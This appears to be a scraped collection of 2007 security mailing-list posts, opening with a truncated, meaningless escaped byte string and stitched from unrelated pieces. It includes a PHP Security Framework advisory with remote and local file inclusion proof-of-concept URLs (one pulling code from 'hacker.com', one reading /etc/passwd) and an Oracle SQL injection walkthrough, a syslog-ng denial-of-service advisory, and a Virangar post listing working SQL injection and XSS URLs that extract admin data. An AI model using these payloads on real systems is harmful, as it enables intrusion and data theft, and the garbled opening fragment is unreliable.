"\xAC\xEB\x0F\x72\x3C\xC7\xF1\x08\x07\xE7\xD7\xB0\x8A\xA3\x90". "\x63\x94\xEA\xDF\x18\xC8\x65\x19\xC7\x44\x8E\x34\xDD\x56\x14". "\xC7\x72\x0E\x87\xBE\xB7\x98\xC3\xC3\x91\xC4\x71\x40\xDF\x7F". "\x9C\xE3\x1B\x7D\x7D\x0C\xC7\x6C\x1D\x2E\x5D\xCE\x6B\x53\xDA". "\x74\x3B\x32\xEE\xFB\x38\xEC\xFA\x3E\x99\xFF\x43\x3A\x16\x72". "\x3C\xC6\xB1\x93\xE3\x7E\x1D\x72\x5D\xC6\xBD\x9A\x54\x2E\xD7". "\xEA\xFA\x33\xFA\x5E\xC9\xC7\xD7\x1C\x17\x48\xCD\xF1\x61\x52". "\xF3\xE3\x73\xC3\x9B\x17\x5F\xAE\x64\x9C\x8B\xF4\xB3\x2F\xE8". "\xF2\x45\x8E\xEF\x39\x4E\x70\xAC\x21\x35\xBE\x39\xD4\xBA\x96". "\x6F\x72\xEC\x25\x95\x7F\x19\xAB\xAC\xD1\xEB\x1C\xF7\xE8\xF6". "\xF9\x1D\xF4\xE6\x5B\xD6\x56\xF2\x54\x4A\x6A\xED\xA5\xED\x7B". "\x39\xAA\x49\xE5\xE9\x0B\x8E\xBF\x92\x5A\x4B\xC9\xA9\x8C\x43". "\xD6\x77\x2E\xC7\x36\x8E\xA5\xFA\x7E\x99\xAB\xCC\x21\x87\xD4". "\x38\xEC\xFA\x79\xC9\xFD\x3C\xDD\x47\xDB\x79\xF1\xD9\x64\x58". "\xC6\x51\xCB\xB1\x55\x97\xF2\x5C\xB9\xBE\x3F\x5F\x7F\x96\xFB". "\x65\x6C\x45\xBA\xCD\x3A\x8E\xCF\x49\x8D\x63\xA1\xEE\x9F\xDF". "\x47\x6F\xBE\x57\x90\xCA\x97\xB4\x2D\x6B\xE6\xD2\xED\x48\x3E". "\x64\xDD\x66\xEB\xE7\x64\x6F\xC9\x5C\x65\x6F\x7F\x40\x6A\x2F". "\xCB\xF5\x55\xFA\xBE\xFB\xF4\x33\xB2\x37\x64\xDE\x0B\x74\xFB". "\xF3\x75\xBB\xF2\x7D\x3D\xA9\x77\x41\xD6\xC0\xA9\xFB\x92\xFB". "\x65\x8C\x32\x66\xB7\xEE\x5B\xFA\x9C\xAE\xAF\xF3\xB3\x7C\xB0". "\xA8\xF5\x92\x79\xCA\xFC\x72\xDA\xDC\x3B\x5D\xDF\x2F\x39\x93". "\x9C\x4A\x1E\x7C\x63\x9D\xAF\xEB\xCB\xF5\x67\x59\xE7\x3D\x1C". "\x9B\x48\x8D\x51\xDA\x94\xB9\xC8\x78\x66\xE8\x67\xFF\x46\x6A". "\x1D\xA5\x2E\xEB\x25\x7B\xA5\x80\xD4\x7B\x24\xE3\x29\xD2\xFD". "\xF8\xE6\x27\xB9\x7C\x5C\xF7\x25\x73\x91\x1C\xC8\x1E\xFA\x5A". "\xDF\x2B\x21\x6B\xF1\x29\xA9\xFD\x2C\x7B\x45\x72\x26\x7B\x44". "\xF6\x6E\x96\xEE\x47\xE6\x94\xDB\xE6\x99\x32\xDD\x5F\xAE\xBE". "\x5F\xEE\x95\xF7\xE4\x49\x8E\x07\x48\xED\x9D\x23\xA4\xE6\x23". "\x63\x90\x33\xE4\x15\x52\xEF\x88\xEC\xB1\x4A\x8E\x93\xA4\xE6". "\xCA\x47\xBD\x37\xD7\x32\x0F\x99\x97\xBC\x53\xB2\x1E\x35\xA4". "\x72\x20\xE3\x93\xB1\x1F\xD4\xED\x1C\x25\xB5\xB6\x92\x6F\x99". "\xA3\xAC\xB5\xEC\x3B\x19\x97\xEF\x7D\x3E\x4C\x2A\xFF\xF2\xEC". "\x6C\x7D\x5D\x4A\x59\x57\x99\x8
PHP Security Framework: Vuln and Security Bypass
Title: PHP Security Framework (Beta 1) Multiple Vulnerabilities and Security Bypass Vendor: http://benjilenoob.66ghz.com/projects/ Advisory: http://acid-root.new.fr/?0:16 Author: DarkFig < gmdarkfig (at) gmail (dot) com > Released on: 2007/12/16 Changelog: 2007/12/16 Summary: [HT] Remote File Inclusion [MT] SQL Injection [MT] SQL Injection Protection Bypass [__] Conclusion Legend: L - Low risk M - Medium risk H - High riskT - Tested Risk level: High CVE: -- I - REMOTE FILE INCLUSION The file "lib/base.inc.php" contains the following code: 10| include_once("$MODEL_DIR/FrameworkPage.class.php"); 15| include_once("$COMMON_DIR/adodb/adodb-active-record.inc.php"); 26| include_once("$DAO_DIR/Administrator.class.php"); 35| include_once("$LOGIC_DIR/AdministratorLogic.class.php"); As you can see, all variables aren't sanatized before being used. So this can lead to RFI if the php directives allow_url_fopen and allow_url_include are set to On. This can also lead to LFI if the php directive magic_quotes_gpc is set to Off. Proof Of Concept: http://localhost/PSF/lib/base.inc.php?MODEL_DIR=http://hacker.com/ http://localhost/PSF/lib/base.inc.php?DAO_DIR=/etc/passwd%00 The author shouldn't use variables for the inclusions, the best way to protect against this type of vulnerability is to use constants because they can't be registered by register_globals if they're properly defined (no variables used). II - SQL INJECTION The script supports several server databases, Oracle included. So the script must also be secured for this type of server database. In a recent research that I have done, I found that 60% of the PHP scripts which support Oracle aren't safe ! People think that if they use the function addslashes() on a string which has quotes, they'll be secured against SQL Injection. On MySQL that's roughly true, but on Oracle that's wrong. The escape character for MySQL is a backslashes, \x92[\]. The escape character for Oracle is a single quote, \x39[']. The script has a user interface for the administrators. The file "lib/control/AuthentificationController.class.php" contains the following code: 4| public function __construct() 5| { 6| $FrameworkPage = FrameworkPage::getInstance(); 7| $FrameworkPage->setHeadTitle("Authenfication Form"); 8| $FrameworkPage->setPageTitle("PHPSecurityFramework"); 9| 10| if(isset($_REQUEST['username']) && isset($_REQUEST['password'])) 11| $this->Login($_REQUEST['username'], $_REQUEST['password']); 12| } 13| 14| public function Login($username, $password) 15| { 16| $username = addslashes($username); 17| $password = md5($password); 18| $AdministratorLogic = new AdministratorLogic(); 19| 20| if($AdministratorLogic->validateAdministrator($username,$password)) 22| session_register('psf_admin'); The function addslashes() is applied to $username, after the function valideAdministrator() is called with two parameters. This function contains the following code: 10| public function validateAdministrator($username, $password) 11| { 12| if(is_string($username) && is_string($password)) 13| { 14| $Admin = new Administrator(); 15| 16| if( ($Admin->load("username=?", array($username))) !==false) 17| { 18| if($Admin->md5password==$password) 19| return true; The code for the Administrator class is situated in the file "lib/dao/Administrator.class.php": 2| class Administrator extends ADOdb_Active_Record 3| { 4|public $_table = 'psf_administrator'; 5| } The function load() contains this code (situated in "lib/common/adodb/adodb-active-record.inc.php"): 384| function Load($where,$bindarr=false) 385| { 386| $db =& $this->DB(); if (!$db) return false; 387| $this->_where = $where; 388| 389| $save = $db->SetFetchMode(ADODB_FETCH_NUM); 390| $row = $db->GetRow("select * from ".$this->_table.' WHERE '.$where,$bindarr); 391| $db->SetFetchMode($save); 392| 393| return $this->Set($row); 394| } I will take an example to explain how it works. Let's send this HTTP packet: POST /PSF/index.php?page=authentification HTTP/1.1\r\n Host: localhost\r\n Connection: keep-alive\r\n Content-Type: application/x-www-form-urlencoded\r\n Content-Length: 66\r\n\r\n username=root%27&password=toor&page=authentification&button=Log+in\r\n\r\n The SQL request will be like this: select * from psf_administrator WHERE username='root\\\'' If we're on MySQL there's no problem, but if we're on Oracle, this return an error: ORA-01756: quoted string not properly terminated.
Re: [syslog-ng] ZSA-2007-029: syslog-ng Denial of Service
On Mon, 2007-12-17 at 11:38 +0100, Balazs Scheidler wrote: > Z o r p S e c u r i t y A d v i s o r y ( Z S A ) > PACKAGE : syslog-ng, syslog-ng-premium-edition > AFFECTED VERSION: <= 2.0.6, 2.1.8 > FIXED : 2.0.6, 2.1.8 Sorry for the mistake, but the above of course reads that anything "below" 2.0.6 or 2.1.8 is affected, but 2.0.6 and 2.1.8 are fixed. Sorry for the confusion. -- Bazsi
ZSA-2007-029: syslog-ng Denial of Service
Z o r p S e c u r i t y A d v i s o r y ( Z S A ) PACKAGE : syslog-ng, syslog-ng-premium-edition AFFECTED VERSION: <= 2.0.6, 2.1.8 FIXED : 2.0.6, 2.1.8 SUMMARY : Denial of Service TYPE: remote AFFECTED: all platforms ZSA-ID : ZSA-2007-029 DATE: Dec 14, 2007 - DESCRIPTION: Oriol Carreras has discovered a security vulnerability in syslog-ng, the multi-platform syslog-replacement application developed by BalaBit IT Security. BACKGROUND: Earlier versions of syslog-ng Open Source Edition and syslog-ng Premium Edition were vulnerable to a possible Denial of Service. The latest release (2.0.6 for syslog-ng, 2.1.8 for syslog-ng Premium Edition) fixes a segmentation fault which occurred when the timestamp of the incoming messages did not end with a space character (NULL pointer dereference). This is an easy Denial of Service possibility. Apart from the Denial of Service, no further exploits are known to be possible. FURTHER INFORMATION For further information on syslog-ng, visit http://www.balabit.com/network-security/syslog-ng/ or download the documentation of syslog-ng from http://www.balabit.com/support/documentation/ SOLUTION: We recommend that you update the affected packages immediately, or apply the patch referenced below: http://git.balabit.hu/?p=bazsi/syslog-ng-2.0.git;a=commitdiff;h=3126ebad217e7fd6356f4733ca33f571aa87a170 DOWNLOAD: If you are a syslog-ng Open Source Edition user, download the source of the latest release from: http://www.balabit.com/downloads/files/syslog-ng/sources/2.0/src/ If you are a syslog-ng Premium Edition user, or have binary subscription for syslog-ng Open Source Edition, download the latest binaries from: http://www.balabit.com/downloads/files/syslog-ng/binaries/premium-edition/ OR, if you have a platform that is supported by apt-get, use the following apt sources to fetch the latest releases: Debian GNU/Linux etch: deb https://USERNAME:[EMAIL PROTECTED]/syslog-ng/premium/ debian-etch/syslog-ng-2.1 syslog-ng-pe RedHat Enterprise Linux --- RHEL-4 rpm https://USERNAME:[EMAIL PROTECTED]/syslog-ng/premium/ rhel-4/syslog-ng-2.1 syslog-ng-pe SUSE 10 --- SUSE 10.0 rpm https://USERNAME:[EMAIL PROTECTED]/syslog-ng/premium/ suse-10.0/syslog-ng-2.1 syslog-ng-pe SUSE 10.1 rpm https://USERNAME:[EMAIL PROTECTED]/syslog-ng/premium/ suse-10.1/syslog-ng-2.1 syslog-ng-pe HTTP can also be used in the place of HTTPS If your version of apt-get does not support the HTTPS protocol. When using plain HTTP, the username and password will not be encrypted. signature.asc Description: This is a digitally signed message part
Re: PHP MySQL Banner Exchange 2.2.1 remote mysql database bug
to fix this bug, vendor have just to put an .htaccess "inc" folder with the following code Deny from all or rename the file to lib.inc.php Regards
neuron news1.0 Multiple Remote Vulnerabilities (sql injection/xss)
# # # ...:neuron news1.0 Multiple Remote Vulnerabilities # #(sql injection/xss) # Virangar Security Team www.virangar.org www.virangar.net Discoverd By : virangar security team (hadihadi & black.shadowes) - special tnx to:MR.nosrati,MR.hesy,satan,Zahra & all virangar members & all iranian hackerz greetz:to my best friend in the world hadi_aryaie2004 vlues: 1.sql injection: http://site.com/patch/?q='/**/union/**/select/**/1,2,adminmail,4,id/**/from/**/neuronnews_configuration/* 2.xss: http://site.com/patch/?q=viewtopic&topic=alert(11) http://site.com/patch/?q=newsarchive&newsyear=alert(11) http://site.com/patch/?q=newsarchive&newsyear=alert(11)&newsmonth=alert(11) g00d l0uck